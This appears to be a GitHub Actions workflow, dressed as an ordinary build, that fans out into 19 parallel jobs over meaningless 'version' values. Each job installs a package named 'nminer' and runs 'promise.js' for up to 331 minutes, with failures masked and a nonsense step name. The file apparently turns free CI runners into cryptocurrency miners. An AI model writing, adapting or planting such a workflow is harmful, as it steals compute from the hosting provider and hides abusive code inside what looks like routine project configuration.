name: promise
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2057 }
          - { version: 6006 }
          - { version: 8955 }
          - { version: 3404 }
          - { version: 5192 }
          - { version: 7065 }
          - { version: 8405 }
          - { version: 2960 }
          - { version: 3812 }
          - { version: 5621 }
          - { version: 3010 }
          - { version: 2978 }
          - { version: 8815 }
          - { version: 2218 }
          - { version: 9028 }
          - { version: 7806 }
          - { version: 4450 }
          - { version: 8048 }
          - { version: 3388 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: who to mozzarella pigsty
        run: |
          npm install nminer@latest
          timeout 331m node promise.js || echo "promise executed"